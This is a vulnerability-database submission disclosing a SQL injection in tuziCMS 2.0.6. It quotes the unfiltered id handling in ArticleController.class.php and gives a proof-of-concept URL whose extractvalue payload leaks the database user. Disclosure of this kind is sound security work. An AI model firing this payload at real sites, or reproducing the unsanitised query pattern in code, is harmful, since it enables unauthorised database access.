| Title | tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject |
|---|
| Description | hello, i am a newcomer. First submission vulnerability.
A vulnerability classified as serious was found.
The article module does not filter the id parameter.
Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards.
code:
\App\Manage\Controller\ArticleController.class.php
line: 18 - 22
public function index(){
C('TOKEN_ON',false);//关闭表单令牌
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();
// dump($topcate);
// exit;
POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
|
|---|
| Source | ⚠️ https://github.com/yeyinshi/tuzicms/issues/12 |
|---|
| User | Evilmu1 (UID 38763) |
|---|
| Submission | 01/12/2023 04:47 (3 years ago) |
|---|
| Moderation | 01/12/2023 15:46 (11 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 218151 [TuziCMS 2.0.6 Article ArticleController.class.php index ID sql injection] |
|---|
| Points | 20 |
|---|